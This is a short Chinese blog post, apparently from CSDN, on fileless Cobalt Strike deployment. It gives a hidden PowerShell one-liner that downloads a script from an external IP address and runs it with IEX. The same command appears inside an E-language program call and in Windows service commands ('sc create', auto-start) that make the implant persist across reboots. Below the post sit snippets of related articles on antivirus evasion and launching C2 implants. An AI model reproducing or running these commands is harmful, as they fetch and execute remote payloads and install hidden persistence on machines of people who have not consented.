cs powershell无文件落地利用

最新推荐文章于 2024-05-03 19:05:25 发布
最新推荐文章于 2024-05-03 19:05:25 发布
阅读量893 收藏 1
点赞数
分类专栏: 杂七杂八 文章标签: 服务器 windows 运维
原文链接:https://blog.csdn.net/wuguojiuai/article/details/115804600?spm=1001.2014.3001.5502
版权

 

目录

一、写入程序

二、cs powershell添加重启上线

三、应用程序添加重启上线

web安全学习了解: web渗透测试   
官网: 宣紫科技   

一、写入程序

cs powershell:

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://39.108.128.1:801/a'))"

以易语言为例:

运行 (“powershell.exe -nop -w hidden -c ” + #引号 + “IEX ((new-object net.webclient).downloadstring('http://39.108.128.1:1231/a'))” + #引号, 假, #隐藏窗口)

二、cs powershell添加重启上线

sc create "name" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://39.108.128.1:801/a'))\""

三、应用程序添加重启上线

sc create "server power" binpath= "C:\Users\Administrator\Desktop\artifact.exe"
sc description "server power" "description" 设置服务的描述字符串
sc config "server power" start= auto 设置这个服务为自动启动
net start "server power" 启动服务

宣紫科技
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Mykings僵尸网络更新基础设施,大量使用PowerShell脚本进行“无文件”攻击挖矿
systemino的博客
05-21 1827
一、概述 MyKings僵尸网络2017 年 2月左右开始出现,该僵尸网络通过扫描互联网上 1433 及其他多个端口渗透进入受害者主机,然后传播包括 DDoS、Proxy(代理服务)、RAT(远程控制木马)、Miner(挖矿木马)、暗云III在内的多种不同用途的恶意代码。由于MyKings僵尸网络主动扩散的能力较强,影响范围较广,对企业用户危害严重。 Mykings僵尸网络的主要更新点: 1.新增IP、域名、URL; 2.大量采用POWERSHELL脚本进行“无文件落地攻击; 3.在清理竞争对手
CS木马的几种上线方式总结
Shanfenglan's blog
10-20 12万+
CATALOG前言windows相关上线方式1.利用mshta与wmic上线2.利用powershell上线3.利用msbuild上线linux相关上线方式1.利用Cross2上线linux主机 前言 CS上线方式还是有不少的,但是时间长不看容易忘记一部分,博客记录也比较分散导致找起来比较麻烦,因此写了这篇博客记录一下CS上线的相关知识点。 windows相关上线方式 1.利用mshta与wmic上线 不用powershell执行powershell脚本与xsl文件落地上线 2.利用powershell
2024年网络安全最全CS木马的几种上线方式总结_cs如何上线(1)
最新发布
2401_84281638的博客
05-03 604
CS上线方式还是有不少的,但是时间长不看容易忘记一部分,博客记录也比较分散导致找起来比较麻烦,因此写了这篇博客记录部分CS上线的相关知识点。
免杀对抗-Powershell-混淆无文件
m0_62172162的博客
04-25 770
免杀对抗-Powershell-混淆无文件
恶意软件“八月”利用powershell进行无文件感染
weixin_34304013的博客
09-04 437
本文讲的是 恶意软件“八月”利用powershell进行无文件感染,Proofpoint安全研究专家提醒,一种叫做“八月”(August)的新型窃取信息恶意软件正利用Windows powershell脚本进行无文件感染并通过Word文档传播。 这个恶意软件是由高度个性化的TA530为载体来传播的,研究者表示,“八月”传播的目标是零售商的客服、管理人员...
不用powershell执行powershell脚本与xsl文件落地上线
热门推荐
Shanfenglan's blog
09-14 17万+
CATALOG前言powershell的本质小试牛刀 前言 前几天在学习windows命名管道的时候偶然看到一篇文章: we don’t neet powershell.exe 作者提供了一种特殊的运行powershell脚本的方式,这种方式既有趣又实用,是通过c#来实现的,因此这也坚定了我学习c#的步伐。 powershell的本质 我们都知道powershell是一个exe程序,它可以执行自己的命令或者powershell脚本。其实powershell的本质就是解释器,类似于python。python
powershell 实时查看文件内容 .txt
04-10
windows下powershell实时查看日志文件内容
Powershell使用OpenFileDialog打开文件示例
09-22
主要介绍了Powershell使用OpenFileDialog打开文件示例,本文直接给出示例代码,需要的朋友可以参考下
PowerShell显示隐藏文件和系统文件的方法
01-20
PowerShell中,列出文件的cmdlet是Get-ChildItem,别名为dir。比如我们使用“dir $env:windir”可以显示Windows目录的文件文件夹。 命令: 代码如下: PS >dir $env:windir 输出: 代码如下: 目录: C:Windows ...
PowerShell批量文件重命名操作实例
09-21
主要介绍了PowerShell批量文件重命名操作实例,本文用一个简单例子来讲解批量重命名操作,需要的朋友可以参考下
power-shell-process-cs:通过脚本运行PowerShell的基础知识。更多后续
03-21
关于 通过Process.Start调用,展示如何将PowerShell与C#结合使用。另一种方法是使用NuGet包直接引用PowerShell。 Microsoft TechNet文章 去做 需要 此类代码可用于实用程序应用程序。请注意,如何设置代码,没有可见的窗口出现,而如果没有正确的设置,则会出现控制台窗口。 ChromeLauncher类可提供访问权限,以在Chrome不在路径中的Chrome中打开网页。 PowerShellOperations类包含处理PowerShell的所有操作 ServiceItem类是用于读取json的具体容器 所有代码都可以从Windows窗体中调用,但可以从控制台项目中调用。 版本1同步获取IP 版本2异步获取IP 应用程序事件json以异步方式定时返回一天的应用程序事件 Application json有一天,使用find和select异步将
控制台通信模块 cmd powershell-易语言
06-11
可以和一般控制台程序直接通信,比如C#,CMD   powershell  等等,但是 易语言 写的控制台好像无法通信,不知道为何,应该是没有继承句柄。。但是cmd却能和它通信,没找到原因。。
PowerShell实现批量重命名文件
09-22
主要介绍了PowerShell实现批量重命名文件,本文直接给出实现代码,需要的朋友可以参考下
CS通过(CDN+证书)powershell上线详细版
qq_50854662的博客
06-01 1282
cdn
powershell cs-UTF-16LE编码上线
weixin_42109829的博客
07-05 647
当我们要上线主机的时候,可能会因为你的代码含有木马字符串,导致无法上线1、 例子 powershell.exe -exec bypass -encodedCommand ZQBjAGgAbwAgACIAMQAyADMAIgA=2、原句子 3、UTF-16LE编码后 (在powershell上能直接执行) powershell.exe -w hidden -exec bypass -encodedCommand SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAg
cs通过生成Payload上线(Powershell的两种上线方式)
久恙502的博客
01-14 722
两种模式下的不同上线方法
使用powershell免杀上线CS的新方式---利用图片
Shanfenglan's blog
04-06 5419
文章目录利用工具模拟上线参考文章 利用工具 Invoke-PSImage 任意一张图片 模拟上线 参考文章 Shellcode隐写到预期RGB免杀上线到CobaltStrike
免杀-PowerShell
weixin_58782362的博客
11-20 731
win自带defender杀毒工具,所以defender和powershell用的同一种语言,很容易被查杀,所以我们尽量就不要用powershell。如果是powershell脚本,只要对方执行就能上线,如果是cmd,先输入powershell,然后payload.ps1。2、执行模式-直接执行命令(有上线代码),最好别在powershell终端执行,容易出错。1、直接在base64编码上添加,然后将垃圾数据替换为空,最后进行解码。混淆、手工混淆,将内容进行base64编码,然后进行解码。
powershell 删除无后缀文件
05-19
你可以使用以下命令来删除无后缀文件: ```powershell Get-ChildItem -Path "C:\path\to\directory" -File | Where-Object {!$_.Extension} | Remove-Item ``` 这个命令会列出指定目录下的所有文件,然后使用 `Where-Object` 过滤掉文件名没有扩展名的文件,最后使用 `Remove-Item` 命令删除这些文件。请将 `C:\path\to\directory` 替换为你要操作的目录的路径。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值